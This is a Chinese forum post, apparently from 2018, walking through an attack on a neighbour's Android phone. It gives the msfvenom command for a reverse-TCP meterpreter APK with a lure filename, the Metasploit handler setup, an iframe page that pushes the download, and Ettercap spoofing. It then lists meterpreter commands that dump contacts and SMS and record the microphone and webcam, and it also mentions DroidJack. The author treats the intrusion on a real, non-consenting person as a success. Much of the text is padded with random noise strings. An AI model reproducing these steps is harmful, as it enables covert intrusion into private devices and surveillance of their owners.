|
3 b/ h4 F4 f! G+ p
五、msf+ettercap入侵邻居安卓手机
: ` p5 Y5 x% e6 j" s
6 B1 N# i- y& |
" J; Z# d$ C0 D1 M% V, K 首先启动msf ( |2 G0 F/ `3 S% u. c
: k# U3 p* i9 m1 y+ @1 I+ n* b& @& d' g2 S, y; Z
先用kali生成一个安卓木马,如下命令: 4 V+ S8 z% X* K% F6 ^- D
S2 [; o8 {& S# L
( J4 m% n9 L0 ]$ K. z' T/ S
Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
7 Q( x e0 N; a2 s. R
: O8 t$ ?$ ^, Y* \: y
6 y! e% e4 h6 `$ I  为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
2 T' C% Q2 Q; A% R1 v 1 f/ Y3 ~" R7 v& X4 m. c
2 D4 t! ]( U# W 然后进入msf ) u; N) g$ m0 P2 a9 U: `0 \
" L% m8 {* i: j0 m: w
X7 w/ @- Y o4 t3 H9 S8 F2 c: u( j use exploit/multi/handler
" h& ]) I4 R* u8 w! u4 q% ~ - x1 Q. z4 R; s
7 Y$ n2 W& w/ `8 O set payload android/meterpreter/reverse_tcp
. O4 O+ n# u! X! d9 U * a% W6 d8 i# p
7 O7 Z- m. x$ O) @& s& P o set LHOST 192.168.0.109 //ip为kaili的ip
* {4 R" Z( f3 D0 y/ M, P9 H
' }8 m- O1 H x2 _* s9 C. U
. l: f1 [0 O2 `# T: U set LPORT 44444 //端口一定要与前面生成的木马的端口一致 , Q$ } [, t7 x: z8 H4 X
! ~ Y' s( G# J. ^' \; n$ h' K3 B5 v. F
Exploit
1 D& ^6 Z& |7 b R1 I " l6 N7 Y/ x" d1 }2 j* K
$ K% U& `9 r; |' V. s7 D9 l  $ n( ]! e' m3 S- ~" m+ `1 I `
8 N3 P% E6 a, W0 G4 `4 i
7 B* j+ _+ S/ U. k2 f6 ^5 ~2 ? 下面我们开启ettercap -G 9 J% Z% n/ i* B8 x# X! @9 a
& a# {6 k. }7 l' F& N
) e& j! ]2 J1 R |" c: S 我物理IP为
: X: W- _' W, N4 X5 S . ^( v+ ~' r0 {: [" `: Z: Q% P
& c% C) ~: E- N2 L. S) o
 ! _1 v, k& a8 _: M A: e! f, |
N( O7 V5 f$ G8 P+ z, D+ U9 H
+ C3 @) G e4 |3 F& s+ ~ 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
7 D3 V( G% J/ M# A ) D N' W3 F7 D" ~$ \
- [% v% b" O8 @2 K* M/ r7 F) [3 V" d: ? 下面我们来设置一下
4 [3 y1 Y, k; P+ }- I( E . {, Y' V+ D5 _, w+ O% M
, B4 V% P5 @" m' y3 Q& j& a
4 X. S _4 _" N E( \6 J 9 V8 T- _5 [+ I1 ~' G5 [7 V6 b y
5 Y6 I7 P7 I! W$ v/ I/ U5 Y 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 5 J' v& O2 H, H- {+ n3 D
$ Z) @$ r: R5 W- C
- \$ [) _: D- G1 Z : a' i6 v- Y% L. e
9 h! s7 q% k5 K2 ?8 f5 a. h* Q1 m& i* N/ A9 z( w1 t
 1 S6 D( k" \7 v6 s$ R: ?% z7 _
' ~. S5 @8 N2 \ [2 Y& r4 r6 `9 j( ~
8 Y' O1 Q I+ H2 J. p
( W- r& ^# F! A6 b1 Q( t; w/ z, Q% {, F8 r
: L1 b0 l8 ]4 E1 D% t# @( F4 }. j & |. }7 z& e" | i1 c! h3 r0 Y
, M/ `" ~) `! o# Z+ L
b+ d& a2 {3 L9 O2 h5 M) x8 q
$ T) a+ A# k) g: M7 J
2 B, s6 _5 [% h- ~
: B3 S# m P4 N2 e7 q8 u1 d9 G0 H
& e" }/ ]6 a* A4 S! \& [ p" S
( b# k+ @+ m8 T$ k: O' A8 ^
) v4 ?2 v* G- p$ z% f# ^, a
6 e3 c# |" \- B2 ~4 N# c4 E
* Z/ H& p0 h) }: S ; S$ z) N0 `: q' ?2 f
# x. I, x7 W4 o8 W) \9 _- H
9 r9 a e" L, h* j- [
S6 S8 v, ]3 K- N6 x / N3 N) a3 B6 {- \
0 D/ J. z) R3 e
8 y" ]; z& A% F% Q1 M( {
6 @) q {: N7 A2 {& N; g( C6 L* o5 n$ I/ n+ t/ Z5 s; m
( o/ a- U+ p* R4 a + l( W7 s6 A! w6 x% o( N
' H% j* w& g% o' K( {4 [2 @
& K5 `$ \7 \) r # J0 j' O$ K9 W0 Q, }
4 A/ _7 R' z8 r- N% Y* X  " B5 D, ]5 W# ?' p
, _; R. w: @/ y% Y' z$ G+ O
t; v5 R1 _' v( g V: d
下面我们开始攻击 + G, u. A ~' T
7 s6 T' K' a$ M; k
9 A; ^3 C& x0 _+ X + J0 x* ~+ B8 v+ ^8 W3 y o
' C& X% _- j& O0 L
# }" A" n# \# w9 l+ {1 M! s( m8 b
# r. R E- {7 f7 d
* B7 o0 V1 w; r, A8 M5 f( ]9 I9 k* u
, U7 O- l/ _: ~- T- U" v3 r
# o. ~' k; m. r( m) u7 J5 ]2 h6 v
% y- K: j! R9 H7 _7 E
" g- z$ Y; A$ C0 u" K. q; {9 U 7 v8 \$ d4 S* F8 ]
8 Z2 [ F) u9 p 
* A4 a0 v6 \+ X" O
9 @% P4 l# t" _( M4 b- ?( a; v8 z$ ~0 Y; x+ }2 a
大概过了5分钟多,发现反弹成功了 5 f4 J/ O: e7 p* k" E" N' Z" h3 J
) p$ a, u) Q; u7 l5 }4 \: [7 q4 d9 Q
0 i" k9 Y" V+ f- X* r( Q 2 Q3 t) c2 D# [: z; M
3 m! ^! Q8 I7 V2 P1 L! S/ n
1 o1 [, A. r1 h7 Q 7 x4 `1 f, H% x5 u4 h. s/ d/ G
2 D# E" _* t7 Y# I: I' v( N) J. ^5 V, d. z: V9 ` J
" V: [: I0 y8 w" _) p" _/ d% h
) K5 M0 Z* L5 ? j/ M1 d5 F
7 k* |! y0 @' D# l; X
6 Y$ o" O( Y$ A4 P8 B( w' | 3 }, T$ g0 v& e- @
8 E/ i% H7 E3 a* [* N! }! y$ K
# ^0 o4 \% u# |7 i2 y
8 T7 ^9 l8 r5 G3 D# X9 i+ `
8 F1 F& `7 c3 M - u. h5 ?: T9 W( P
* j1 D& S/ z' K$ L) x0 d& c2 ?2 V8 D3 m
3 K8 s# e7 w3 n5 J
: ^5 F8 w' u" g3 `2 i" i! T0 i6 @2 d. M/ O( S! g
执行命令 / l2 o* j; { P6 g' F, w+ d1 d
. N0 t$ y7 M V0 X! {0 x: @" j" A$ d/ N
" a0 q" E, S7 y; ~$ C! d; x# ?7 {6 B
4 i; K8 C7 K+ K; H2 u n
: h% B, z4 @ [
dump_contacts --》这个是导出电话
% s- l9 N s( c8 b6 ^2 k7 G
1 x0 | K( p/ z8 O1 S* h: Y2 c8 D5 c0 N4 G' r% G7 `
dump_sms --》这个是导出信息
! ^- N! z, K' q) y
1 Q N* `# Q" c! M9 h" h4 A2 p" \9 p$ u% Q% \5 w9 g+ X& W
record_mic Record audio from the default microphone for X seconds
, `/ O, P' w4 W" o+ x! j % j. T! e9 \2 v' |! i6 M7 u
6 I& X2 h, f6 |+ k' s0 r$ i webcam_chat Start a video chat % X+ ^! w3 X' A2 L% k6 k
5 }' Q0 E' x# `/ b u5 p! Q; g& x, Y" I; u
webcam_list List webcams
. ^- g" i9 `& R2 n$ C % q8 B) \: q0 Y
+ G/ m9 O7 V6 o3 `$ J. Q webcam_snap Take a snapshot from the specified webcam
% Q/ ~, b! b* b+ h2 A0 m% t . l2 C4 [; j- F" m; P( q
E' g* q( P9 A: G3 ]4 e% @ webcam_stream  lay a video stream from the specified webcam
5 m, \. T {5 w( | x6 e* U 7 L: M# G1 \' ?+ [0 t
2 ? e& T+ i6 p$ a 
1 C& N* |- \# h+ u7 K3 t) b
# \* |* q, y; G7 l* Z8 R1 K# J) z* I5 V
 7 f' R5 u' b1 \, p3 q& g
* x' X' d2 C! W: N D A
: B( p) m' p+ A5 T 我们打开看一下电话薄,
2 ^# e- ?0 P ^# G ! ~7 O* K; l9 O$ U" h8 q/ T
# R7 [' h. A, M- X
6 ~ F6 m6 S4 j3 v+ a! X
L! V$ _+ J( ~4 I X2 ?( h( i+ n1 z0 a$ W: p7 A7 p! h' e5 d# B+ o( K
 1 H- n4 u& Z) W. H/ e* d
{8 N3 | K" G0 ?+ L$ d; L. [/ H C8 M1 I/ D9 X
+ V8 Q9 K( p' N6 q ; L: d$ B" ]9 a/ L1 \* X
% Q H* ]7 g) y9 z4 K
 8 q3 Z( C; |: K
2 H# ]# K( C! G4 b
% K5 x' K; A8 R; E, U  2 j7 P- E1 U0 S* {6 O- }
5 F; D4 c' a' r; E, S0 R M! D
8 E' ~( f; R7 T. P. M+ m+ ~
' Q0 z5 H% k/ S3 Z: B
( i( f3 F. y! s& @
, V; L$ f# |7 Z/ m! @" t% Q; H1 ] 我们同时欺骗成DroidJack木马,使用方法如图:
. Q5 T, V# u6 C+ m' X . ^5 v/ s! ?3 U3 X* q/ p9 b
& C% j1 V9 c6 A2 o
 $ e$ w6 `* U v& K8 N5 b' Q/ R
; ~4 k: ]4 W' x/ k, x: N% f
' f! z8 z* t' {0 A . K0 Z! D+ P. F+ Q$ V0 K( ?
6 h& }3 b) V; y
% H* _0 y9 ~% D" Z$ s  7 Z4 [. a* c& w0 q$ ?- [
4 k) M" s6 G1 n% f
6 d( P/ G$ x7 X V 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 # n' h( h) L% `6 ]7 k
: S M* ?6 T! @1 P9 l- i
: b U1 I. O \) i" b0 M3 s; u" x
9 z; ]( O* M; z2 O. Z7 Z2 T
* D( V+ d+ }* e; }, C
" _5 }7 q! W% h* h- f* H% h 
D7 v! V3 U8 @3 p
" Y6 N4 D' i; z2 Q- u" H) [. A3 X$ u: Q
W4 ]. F! ]1 t& I2 O! t; v+ X6 `8 W ) Q% H/ @2 u2 g- [3 ^
$ i( y" B6 _+ B" {6 H1 X. p
 
Z$ u; }$ d$ O2 k5 u 8 K" s# w, ^; z* C! Z' j5 v
0 E* i# c2 G1 I/ i; K4 h. K% \6 C
" G# q8 \8 t) E6 g
| 
发表于 2018-10-20 20:30:37
收藏
支持
反对